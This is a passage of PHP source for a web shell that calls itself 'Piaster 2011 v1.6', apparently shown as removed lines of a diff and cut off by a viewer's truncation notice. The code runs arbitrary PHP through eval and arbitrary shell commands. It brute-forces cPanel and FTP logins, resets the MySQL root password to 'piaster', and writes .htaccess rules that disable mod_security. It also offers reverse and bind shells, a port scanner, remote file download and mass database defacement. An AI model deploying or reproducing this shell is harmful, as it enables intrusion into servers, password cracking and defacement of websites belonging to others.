- if(@fclose($han)){echo "File ".$ft1." Uploaded";}else {echo "Noop!";}
- }
-
- switch(true){
- case(oP == '7'):{ mailr_s();}break;
- case(oP == '9'):{ccf();}break;
- case(oP == '11'):{ htc();}break;
- case(oP =='12'):{zh();}break;
- case(oP =='15'):{ sear();}break;
- case (oP == '14'||isset($_REQUEST["crtty"])):{hashw();exit();}break;
- case(oPp == '3'):{rs('cfed','141','22',$st='readonly');show_users();echo "</textarea>";}break;
-
- case(oPp =='5'):{ sqlinj();}break;
- case(oPp == '6'):{ ps5s();}break;
- case(oPp == '7'):{ extr_i();}break;
-
-
- case(isset($_REQUEST["evap"])):{
- rs('cfed','141','22',$st='readonly');
- $sd = stripcslashes($_POST['evac']);
- @eval($sd);
- echo "</textarea>";}break;
-
- case(isset($_REQUEST["gotod"])):
- {
- rs('cmdm','141','22',$st='readonly');
- $path =htmlspecialchars($_POST['goto']);
- $dih = @opendir($path) or die("<br><b>Permision denied! Unable to open dir $path");
- if(wdll_chf())echo wdll_cmdf('dir');else htmlspecialchars(htmlspecialchars(wdll_updir($dih, $path)));
- echo "</textarea>";}break;
-
- case(isset($_REQUEST["finds"])):
- {$pathh =htmlspecialchars($_POST['goto']);
- $fin = htmlspecialchars($_POST['fin']);echo "Find File = ".$fin." Dir = ".$path ;
- rs('cmdm','141','22',$st='readonly');
- $dih = @opendir($pathh) or die("<br><b>Permision denied! Unable to open dir $path");
- echo wdll_nora($dih,$pathh,$fin);
- echo "</textarea>";}break;
- case (isset($_REQUEST["mvdi"])):{rs('cmdm','141','22',$st='readonly');
- $cop = true;
- $mvdir = htmlspecialchars($_POST['movd']);
- $dst = htmlspecialchars($_POST['destd']);
- if(!empty($_POST['rvm'])){$cop = false;}
- md($mvdir,$dst,$cop);echo "</textarea>";
- }break;
-
-
- case(isset($_REQUEST["gip"])):
- {echo "<br>SQL INJECTION FOUNDER<br>";
- rs('cmdm','141','22',$st='readonly');
- echo sqlj_do($_REQUEST["ipp"]);
- echo "</textarea>";
- echo "<p align=\"center\"><a href=\"javascript: history.go(-1)\">Back</a></p>"; ft(); die;
- }break;
- case(isset($_REQUEST["gfil"]) || isset($_REQUEST['gfils'])|| isset($_REQUEST['show'])):
- {echo "<form name=\"savf\" action=\"".$php."\"method=\"post\">";
- rs('cfed','141','22');
- if($_GET['show']) {$pos = @base64_decode(htmlspecialchars($_REQUEST['show']));
-
- if(function_exists('file_get_contents'))
- {echo @file_get_contents($pos);}
- elseif(function_exists('file'))
- {echo @file($pos);}
- elseif(function_exists('fread')){$x5 = @fopen($pos,'rw');$dc = @fread($x5,@filesize($pos));@fclose($x5);}
- else {rf();} echo "</textarea>";inp('hidden','50','goto',path);
- inp('hidden','50','svdi',$pos,'','<br>');
- sub('svff','Save',$pr='<br>');exit;}
-
- elseif(isset($_REQUEST['gfils'])){$pos = $HTTP_POST_VARS['cfils'];sqlf($pos);}
- else {$pos = $HTTP_POST_VARS['cfil'];}
-
- switch($_REQUEST['getm']){
- case('1'):{{$x5 = @fopen($pos,'rw');$dc = @fread($x5,@filesize($pos));@fclose($x5);echo $dc;}}break;
- case('2'):{echo rf();}break;
- case('3'):{if(function_exists('file_get_contents')){echo @file_get_contents($pos);}}break;}
-
- echo "</textarea>";
- inp('hidden','50','goto',path);
- inp('hidden','50','svdi',$pos,'','<br>');
- sub('svff','Save',$pr='<br>');}break;
- case(isset($_REQUEST['cmdr'])):{
- rs('cmdm','141','22',$st='readonly');
- $pos = $_POST['cmde'];
- echo wdll_cmdf($pos);
- echo "</textarea>";}break;
- case(isset($_REQUEST['aliA'])) :{
- $alis = $_REQUEST['alI'];
- define('dir',$alis);
- echo "Command: ".$alis."<br>";
- rs('cmdm','141','22',$st='readonly');
- echo wdll_cmdf($alis);
- echo "</textarea>";}break;
- case(isset($_REQUEST['spots'])):{
- rs('cmdm','141','22',$st='readonly');
- ps();
-
- echo "</textarea>";
- echo "<p align=\"center\"><a href=\"javascript: history.go(-1)\">Back</a></p>"; ft(); die;}break;
-
- case(isset($_REQUEST['crcf'])):{if(!curc())die("Curl Not Avilable on this Server Can.t complete opration!");else{
- $prt=$_REQUEST['port'];
- $us=$_REQUEST['uses'];
- $pa=$_REQUEST['pass'];
- $sit=$_REQUEST['site'];
- $crt=$_REQUEST['crt'];
- if($crt == ""){echo "\nERORR: Chois Crack Type Cpanel OR FTP ?\n";
- echo "<a href=\"javascript: history.go(-1)\">Back</a>";die;}
- echo "Crack Type: ".$_REQUEST['crt']."\n[~] Cracking Process Started, Please Wait ...\n";
- rs('cmds','141','22',$st='readonly');
- $us=explode("\n",$us);
- $pa=explode("\n",$pa);
- echo "Crack Type: ".$_REQUEST['crt']."\n[~] Cracking Process Started, Please Wait ...\n";
- if($sit == ""){$sit = "localhost";}
- if($prt == ""){$prt = "2082";}
- foreach ($us as $u){$usr = trim($u);
- foreach ($pa as $p ){$pwd = trim($p);
- if($crt == "FTP"){echo fc($sit,$usr,$pwd,$tl);}
- if ($crt == "Cpanel"){echo cc($sit,$prt,$usr,$pwd,$tl);}}}
- echo "\n[~] Cracking Process Done!\n";
- echo "</textarea>";unset($crcf);}}break;
-
- case(isset($_REQUEST['dhtc'])):{
- $ctc = htmlspecialchars($_POST['htc']);
- $clc = htmlspecialchars($_POST['mhtc']);
- rs('cmds','141','22',$st='readonly');
- switch($_REQUEST['htcc']){
- case('ch'):{$hd = @fopen(".htaccess","w+");@fwrite($hd,$clc);if(@fclose($hd)){echo "[+] Htaccess Created!";}}break;
- case('cpp'):{$hd = @fopen(".htaccess","w+");@fwrite($hd,"AddType application/x-httpd-php4 .php");if(@fclose($hd)){echo "[+] Htaccess Created!";}}break;
- case('cpe'):{$hd = @fopen(".htaccess","w+");@fwrite($hd,"<FileMatch '^.*\.$ctc>\r\nSetHandler application/x-httpd-php\r\n</FilesMatch>");if(@fclose($hd)){echo "[+] Htaccess Created!";}}break;
- case('cre'):{$hd = @fopen(".htaccess","w+");@fwrite($hd,"Options ExecCGI\r\nAddType application/x-httpd-cgi .$ctc\r\nAddHandler cgi-script .".$ctc);if(fclose($hd)){echo "[+] Htaccess Created!";}}break;
- case('fis'):{$hd = @fopen(".htaccess","w+");@fwrite($hd,"<IfModule mode_security.c>\r\nSecFilterEngine Off\r\nSecFilterScanPOST Off\r\n</IfModule>");if(fclose($hd)){echo "[+] Htaccess Created!";}}break;
- case('cpi'):{$hd = @fopen("php.ini","w+");@fwrite($hd,$clc);if(@fclose($hd)){echo "[+] PHP.ini Created!";}}break;}
-
- echo "</textarea>";unset($dhtc);}break;
- case(isset($_REQUEST['zhsd'])): {rs('cmds','141','18',$st='readonly');
- if(!curc())die("Curl Not Avilable on this Server Can.t complete opration!");else{
- $hnam = htmlspecialchars($_POST['hname']);
- $htype = htmlspecialchars($_POST['htype']);
- $hwhy = htmlspecialchars($_POST['hwhy']);
- $hsts = htmlspecialchars($_POST['sts']);
- $hdo= explode("\n", $hsts);
- foreach ($hdo as $uu){$sitss = trim($uu);
- echo zhsr($hnam,$htype,$hwhy,$sitss);}
- }echo "</textarea>";unset($zhsd);}break;
-
- case (isset($_REQUEST["ext_si"])) : {
- rs('cmds','141','22',$st='readonly');
- extr_si();
- echo "</textarea>"; echo "<br><br><a href=\"".$php."\">Home</a>| |<a href=\"javascript: history.go(-1)\">Back</a><br>";ft();exit();}break;
-
- case (isset($_REQUEST['urlup'])):
- {rs('cmds','141','22',$st='readonly');
- $url = htmlspecialchars($_POST['urlf']);
- $file = htmlspecialchars($_POST['localf']);
- $pathf = htmlspecialchars($_POST['pathf']);
- if(fetchFilef($url,$pathf,$file)) {echo "[+]Uploaded file saved as ". path.'/'.$file;}else
- {echo "[+] Check the directory permissions for (must be 777)!\nor \nCheck URL!";}
- echo "</textarea>";unset($urlup);}break;
-
- case(isset($_REQUEST['crypfl'])||isset($_REQUEST['crypo'])):
- {rs('ccrt' ,'141','22',$st='');
- if(isset($_REQUEST['crypo']))
- $file=@fopen($_FILES['userfile']['tmp_name'],"r") or die ("[-]Error reading file!");
- $meth=$_POST['crypt'];if ($meth=="1") {echo stripcslashes(md5(@fread($file,100000)));} elseif ($meth=="2") {echo stripcslashes(crypt(@fread($file,100000)));}
- elseif ($meth=="3") {echo stripcslashes(sha1(@fread($file,100000)));}
- elseif ($meth=="4") {echo stripcslashes(crc32(@fread($file,100000)));}
- elseif ($meth=="5") {echo stripcslashes(urlencode(@fread($file,100000)));}
- elseif ($meth=="6") {echo stripcslashes(urldecode(@fread($file,100000)));}
- elseif ($meth=="7") {echo stripcslashes(@base64_encode(@fread($file,100000)));}
- elseif ($meth=="8") {echo stripcslashes(@base64_decode(@fread($file,100000)));}
- echo "</textarea><div align=left>";echo '<br><form enctype="multipart/form-data" method="post"><b>File:<br><input name="userfile" type="file"><br><br><input type="submit" value="Crypt" name="crypo"><br><br><hr><input type=radio name=crypt value=1>md5();<br><hr><input type=radio name=crypt value=2>crypt();<br><hr><input type=radio name=crypt value=3>sha1();<br><hr><input type=radio name=crypt value=4>crc32();<br><hr><input type=radio name=crypt value=5>urlencode();<br><hr><input type=radio name=crypt value=6>urldecode();<br><hr><input type=radio name=crypt value=7>base64_encode();<br><hr><input type=radio name=crypt value=8>base64_decode();<br>';echo "<hr><div align =\"center\"><br><br><a href=\"javascript: history.go(-1)\">Back</a>";echo "<p align=\"center\"><a href=\"".$php."\">Home</a><br></p>";
- exit;
- }break;
-
- case(oP == '8'):{ indexc();exit();}break;
- case(oPp == '1'):{ vbsql();exit();}break;
- case(oPp == '2'):{ backc();}break;
- case(oPp == '4' || $_REQUEST['piasS']):{
-
-
- if($win) {
- define('STDIN',@fopen("php://stdin","r"));
- $input = trim(@fgets(STDIN,256));
- $input = ereg_replace('\"', "\\\"", $input);
- $input = ereg_replace('\'', "\'", $input);
-
- echo "| |<a href=\"".$php."\">Home</a></p>";
- if(wdll_chf()) wdll_cmdf("net stop mysql");
- if(wdll_chf()) wdll_cmdf('start /b C:\AppServ\MySQL\bin\mysqld-nt.exe --skip-grant-tables --user=root');
- if(wdll_chf()) wdll_cmdf("C:\AppServ\MySQL\bin\mysql -e \"update mysql.user set PASSWORD=PASSWORD('piaster') where user = 'root';\"");
- if(wdll_chf()) {wdll_cmdf("C:\AppServ\MySQL\bin\mysqladmin -u root shutdown");
- echo '<br> Please wait ................................... Goodluck ...Win phpMyAdmin Hacked :: <br>USER: root & PASSWORD: piaster<br><br><br><p align="center"><a href="javascript: history.go(-1)">Back</a>';}else echo " I think function disable or Path: 'C:\AppServ\MySQL ' not found on this server edit Path..Bug only in AppServ about www.appservnetwork.com";
- sleep(3);
- if(wdll_chf()) wdll_cmdf("net start mysql");}
-
- if(!$win) {
- echo '<form action="#" method="post">';
- inp('input','20','dbu',$_REQUEST['dbu'],$ti='user',$pr='');
- inp('input','20','dbp',$_REQUEST['dbp'],$ti='password',$pr='');
- inp('input','20','dbh',$_REQUEST['dbh'],$ti='host',$pr='');
- sub('piasS','GO',$pr='');
- echo '</form>';
-
-
- if(isset($_REQUEST['piasS'])){
-
- $dbu = $_REQUEST['dbu'];
- $dbp = $_REQUEST['dbp'];
- $dbh = $_REQUEST['dbh']? $_REQUEST['dbh'] : 'localhost';
-
- $conn = @mysql_connect($dbh, $dbu, $dbp);
- $select = @mysql_select_db('mysql', $conn);
- if (!$select) {
- echo @mysql_error();}
-
- $t1 = "UPDATE mysql.user set PASSWORD=PASSWORD('piaster') where user = 'root';";
- $go1 = @mysql_query( $t1 , $conn);
-
- if($go1){echo '<center><br>Goodluck ... Lunix phpMyAdmin Hacked :: Now Wait Until Mysql Restart and Come back with USER: root & PASSWORD: piaster<br><br><br><p align="center"><a href="javascript: history.go(-1)">Back</a></p></center>';
- echo "| |<a href=\"".$php."\">Home</a>";}
- }}exit();}break;
-
- case(isset($_REQUEST['vbsq'])):{ vb_opt();exit();}break;
-
- case(oP == 6):{
- //echo "<hr color= #993333>";
- rs('cmds','120','20',$st='readonly');
- if(wdll_chf()){ if(!$win){echo wdll_cmdf('ls -la');}else echo wdll_cmdf('dir');}else
- {$dih = @opendir(path) or die("<br><b>Permision denied! Unable to open dir $path");
- wdll_updir($dih, path);}
- echo "</textarea>"; }break;
- default:{echo "<font color = orange>
- Hello <br>
- I hope you will find useful tool to perform your job properly<br>
- Also heal myself if your use of it in harm to people <br>
- Always remember<br>
- Easy Come Easy Go.<br>
- Piaster 2011 v1.6<br>
- ";}//---------------------------------
- }
- echo " <table>";
-
- if($_REQUEST['wbp']){bbc($_REQUEST['wbcp']);}
- if($_REQUEST['lbg']){bbc($_REQUEST['lbcp']);}
- if($_REQUEST['bpg'] ){bbc($_REQUEST['bcpo'],$_REQUEST['bcip']);}
-
- echo "<br>" ;sl();
-
- echo "<br><br>";
-
- echo "<table><tr><td>";
- //echo "<hr color= #993333>";
- cm_ge(); echo "</td><td>";
- //echo "<hr color= #993333>";
- cm_gee();echo "</td></tr></table>";echo "<hr color= #993333>";
- if (oP == '13' || !empty($_POST['evac'])) {echo eva();}
- else db_lg() ;echo "<br>";urlp();echo "<hr color = #993333><br>"; movdr();
- echo "<hr color = #993333></div>";
- echo "</table>";
- function mailr_s(){
- echo "<form name=\"savf\" action=\"".$php."\"method=\"post\">";
- inp('text','30','mnam',$_REQUEST['mnam'],'Your name: ','');
- inp('text','30','mmail',$_REQUEST['mmail'],'Your e-mail: ','');
- inp('text','30','mito',$_REQUEST['mito'],'To: ','');
- inp('text','30','msubj',$_REQUEST['msubj'],'Subject: ','<br>');
- are('mmsg',$_REQUEST['mmsg'],'80','8',$st ='',$pr ='<br><br><br><br>');
- sub('mSendm','Send');}
- function sear(){
- echo "<br><br><table bgcolor=black border = 1><tr><td><form action=\"".$php."\"method=\"post\">";
- echo 'Path<br>';
- inp('text','63','serdir',path,'','<br>');
- echo '<br>';
- echo 'Search DIR<br>';
- inp('text','32','sedir','include','','<br>');
- inp('radio','10','sea','cedr','Directory only','<br>');
- echo '<br><div align = left>';
- echo '<br>Key word';
- are('searcc','','60','5',$pr ='<br>',$id='');
- echo '<br>';
- inp('radio','10','sea','cepr','Preg_Match (Regular expressions)(into file)','<br>');
- inp('radio','10','sea','cewo','words only (into file)','<br>');
- inp('radio','10','sea','cefn','File Name (same key word ex: config.php)','<br>');
- inp('radio','10','sea','cefi','File Name (include yo key word)(min char = 3)','<br>');//
- inp('radio','10','sea','cefm','File Mode (like 666 ,777 ...etc)','<br>');
- inp('radio','10','sea','ceft','File Type (like php,txt ...etc)','<br><br>');
- echo '<div align = center>';
- sub('search','Search');
- echo '</form></div></ts></tr></table>';
- echo "<br><a href=\"".$php."\">Home</a><p align=\"center\"><a href=\"javascript: history.go(-1)\">Back</a></p>"; ft(); die;}
-
- function hashw()
- { $crtf = $_POST['crrt'];echo "<form action=\"".$php."\"method=\"post\">";
- are('crrt',stripcslashes($crtf),'80','8','<br>',$id='');echo "<br><br><br><table width = \"100\" border=1 bgcolor =\"000000\" ><tr>";echo '<td>md5:</td><td>';
- inp('text','80','cc',stripcslashes(@md5($crtf)),'','<br>');echo "</td></tr>";echo '<td>crypt:</td><td>';
- inp('text','80','cc',stripcslashes(@crypt($crtf)),'','<br>');echo "</td></tr>";echo '<td>sha1:</td><td>';
- inp('text','80','cc',stripcslashes(@sha1($crtf)),'','<br>'); echo "</td></tr>";echo '<td>crc32:</td><td>';
- inp('text','80','cc',stripcslashes(@crc32($crtf)),'','<br>'); echo "</td></tr>";echo '<td>urlencode:</td><td>';
- inp('text','80','cc',stripcslashes(@urlencode($crtf)),'','<br>'); echo "</td></tr>";echo '<td>urldecode:</td><td>';
- inp('text','80','cc',stripcslashes(@urldecode($crtf)),'','<br>');echo "</td></tr>";echo '<td>base64_encode:</td><td>';
- inp('text','80','cc',stripcslashes(@base64_encode($crtf)),'','<br>'); echo '</td>';echo "</td></tr>";echo '<td>base64_decode:</td><td>';
- inp('text','80','cc',stripcslashes(@base64_decode($_POST['crrt'])),'','<br>'); echo "</td></tr>";echo '</tr>';echo '<br><br>';
- echo '</td>';echo "</td></tr>";echo '<td>dec2hex:</td><td>';
- $c = strlen($crtf); for($i=0;$i<$c;$i++) { $hex = dechex(ord($crtf[$i])); if ($crtf[$i] == "&")
- {echo $crtf[$i];} elseif ($crtf[$i] != "\\") {echo "%".$hex;}}
- echo '</table>';
- sub('crtty','Crypt','');echo ' ';sub('crypfl','Crypt File');echo '<br><br>';
- echo "<a href=\"javascript: history.go(-1)\">Back</a></div><hr>";echo "<p align=\"center\"><a href=\"".$php."\">Home</a><br></p>";}
-
- function extr_i(){
- echo "<form action=\"".$php."\"method=\"post\">";
- inp('text','50','sqtid','','IP/HOST:');
- sub('ext_si','Extract!','<br>');
- echo "</form>";
- }
- function indexc()
- {$xq = 'UPDATE "dbname".template name SET template name = "index code" WHERE title = "field title"';
- echo "<form action=\"".$php."\" method=\"post\">
- <div align =\"center\"><b>Index Code</b>";
- are('coded','Post your code here','50','20','<br>');
- echo '<div align=left>';
- echo "<b>File Options</b><br><hr color=black>";
- inp('text','40','masdr',path,'Path');echo ' ';inp('text','20','skid','Dir name','Skip Dir');echo "<br>";
- inp('radio','10','msi','msfi','Just indexes','<br>');
- inp('radio','10','msi','msfa','all files','<br>');
- inp('radio','10','msi','msfr','Remove all without indexes');
- echo "<hr color=black><b>DataBase options</b><br>";
-
- echo "<br>";
- inp('radio','10','msi','msvb','VB','<br>');
- inp('radio','10','msi','msbb','MyBB','<br>');
- inp('radio','10','msi','msin','Infinty','<br>');
- inp('radio','10','msi','mswp','WordPress','<br>');
- inp('radio','10','msi','msjo','Jomla','<br>');
- inp('radio','10','msi','msrd','Remove DB!','<br>');
- inp('radio','10','msi','msot','Other | index code = $coded','<br>');
- inp('text','100','msqur',$xq,'Query:');echo "<br><br>";
- inp('text','15','sqdbn',$n,'DBname:');
- inp('text','15','sqlog',$u,'DBuser:');
- inp('text','15','sqpwd',$p,'DB_PWD:');
- inp('text','13','sqsrv','localhost','HOST:');
- inp('text','13','sqprt','3306','PORT:');
-
- echo "<hr color=black><br><br><div align =\"center\">";
- sub('massa','Mass Index!','<br>');
- echo "</form>";
- echo "<a href=\"".$php."\">Home</a><br><br>";exit;}
-
- function sqlinj(){
- echo "<center>FIND SQL INJECTION ON OTHER REMOTE SERVER <BR>";
- echo "<form name=\"site\" action=\"".$php."\"method=\"post\">";
- inp('text','20','ipp','',' IP ','<br><br>');
- sub('gip',' Find SQL Inj','<br>');
- echo "</form>";
- }
- function ccf(){
- $wrdlist= "1234556 \n987654321\n963852741\n321654\n987654321\n963741\n951753\n852654\n987321\n321987951753";
- if(wdll_chf()){$userlist = wdll_cmdf('ls /var/mail');}else $userlist ="users";
- echo "<form action=\"".$php."\"method=\"post\"><br><br>";
- $loca = $_SERVER['SERVER_NAME'];
- inp('text','30','site',$loca,'HOST/IP');
- inp('text','5','port','2082','Port','<br>');
-
- if(!empty($_REQUEST['uses'])){ $userlist = $_REQUEST['uses'];}
- echo "<table><tr><td>";
- are('uses',$userlist,'10','20',$pr ='');echo "</td><td>";
- if(!empty($_REQUEST['pass'])){$wrdlist = $_REQUEST['pass'];}echo "</td><td>";
- echo "<textarea id='passw' name='pass' cols='10'rows='20' onselect='cp()' onchange='cp()' onkeydown='cp()' onkeyup='cp()' onchange='cp()'>".$wrdlist."</textarea>";
- echo "</td></tr></table>";
- echo "<br>
- <b>Password Number : <span id='pn'>0<br></span>
- <span><font color=orange><b>Split The Password List By:</font></span><br>
- <input name='textml' id='spl' type='text' value=',' size='5'/>
- <input type='button' onclick='psplit()' value='Split'>";
- echo "<br><br>";
- inp('radio','10','crt','cp','Cpanel [2082]');
- inp('radio','10','crt','FTP','FTP [21]','<br>');
- echo "<br>";
- sub('crcf','Crack');
- echo "</form>";
- echo "<br><a href=\"".$php."\">Home</a><br><br>";
- ?>
- <body onload="cp">
- <script type="text/javascript">
-
- window.onload = pchange;
- var xy = false;
- function psplit(){
- var yx = document.getElementById("passw").value;
- var yz = document.getElementById("spl").value;
- var nora=new Array();
- nora = yx.split(yz);
- document.getElementById("passw").value="";
- var i;
- for(i=0;i<nora.length;i++){
- document.getElementById("passw").value += nora[i]+"\n";}
- cp();}
- function cp(){
- var etext = document.getElementById("passw").value;
- var nora=new Array();
- nora = etext.split("\n");
- document.getElementById("pn").innerHTML=nora.length+"<br />";
- if(!xy && nora.length > 50000){
- alert('If passwords list More Than 50000 passwords This May Hang The Server');
- xy = true;}}</script>
- <?php
- exit();}
-
- function backc(){
- echo "<form action=\"".$php."\"method=\"post\">";
- inp('text','20','bcip',$_SERVER['REMOTE_ADDR'],'IP:');
- inp('text','10','bcpo','1985','Port');
- sub('bpg','Connect!','<br><br>');
- echo 'Lunix Bind Port <br>';
- inp('text','10','lbcp','1985','Port');
- sub('lbg','Connect!','<br><br>');
- echo 'Win Bind Port<br>';
- inp('text','10','wbcp','1985','Port');
- sub('wbp','Connect!');
- echo "</form>";
-
- echo "<p align=\"center\"><a href=\"javascript: history.go(-1)\">Back</a><center><br></p>";}
- function urlp(){
- echo "<form action=\"".$php."\"method=\"post\">";
- inp('text','50','urlf','http://www.','URL:');
- inp('text','50','pathf',path,'Path');
- inp('text','10','localf','wdll.zip','Save as');
- sub('urlup','Upload!');
- echo "</form>";}
-
- function ps5s(){
- echo "<form action=\"".$php."\"method=\"post\">";
- inp('text','30','hot','IP/Domain');
- inp('text','8','spot','1','FROM');
- inp('text','8','epot','100','TO');
- sub('spots','Scan');
- echo "</form>";
- }
- function ch()
- {
- echo "<select name=ch>
- <option value=cm>CHMOD</option>
- <option value=co>CHOWN</option>
- <option value=cg>CHGRP</option>
- <option value=cu>Unlink</option>
- </select>";inp('text','44','cfx',path);inp('text','8','cfy','0666');sub('chfl','Ok');}
-
- function movdr(){
- echo "<form action=\"".$php."\"method=\"post\">";
- inp('checkbox','','rvm','remov','Remove dir after copy');
- inp('text','50','movd',path,'FROM');inp('text','47','destd',path,'TO');
- sub('mvdi','Move');echo "</div>";
- echo "</form>";}
-
- function eva()
- {echo "<form action=\"".$php."\"method=\"post\">";
- $valo = '//unlink G5.php';
- are('evac',$valo,'125','5',$st ='',$pr ='<br><br><br><br>');
- sub('evap','Run PHP Code',$pr='<br>');echo "</form>";}
-
- function sk_ju()
- {inp('checkbox','50','Ski','Ski','Skip');
- inp('checkbox','50','Jum','Jum','Jump');
- inp('text','20','askid','uploads','DIR');}
-
- function cm_ge()
- {$aliss = '';
- $aliss = dir;
- echo "<form method=\"POST\" action=\"".$php."\" enctype=\"multipart/form-data\">";
- echo "<table dir =left border=1 bgcolor =\"000000\" ><tr><td>Execute</td><td>";
- inp('text','55','cmde',$aliss,'');sub('cmdr','CMD',$pr='<br>');echo "</td></tr>";
- echo "<tr><td> Get File</td><td>";
- echo"<select size=\"1\" name=\"getm\" title=\"FileS Action\" >
-
- <option value=\"2\">Mode [0]</option>
- <option value=\"1\">Mode [1]</option>
- <option value=\"3\">Mode [2]</option>
-
- </select>";
- if(isset($HTTP_POST_VARS['cfil']))$oop = $_POST['cfil'];else $oop = path;
- inp('text','42','cfil',$oop,'');sub('gfil',' Get ','<br>');echo "</td></tr>";
-
- echo "<tr><td>Go Dir</td><td>";
- inp('text','55','goto',path,'');sub('gotod',' Go ','<br>');echo "</td></tr>";
- echo "<tr><td>Locate</td><td>";
- inp('text','55','fin','config.php','');sub('find','Find');echo "</td></tr>";
-
- echo "<tr><td>Upload</td><td>";
- inp('hidden','55','MAX_FILE_SIZE',$umf,'');
- ec…
Large files files are truncated, but you can click here to view the full file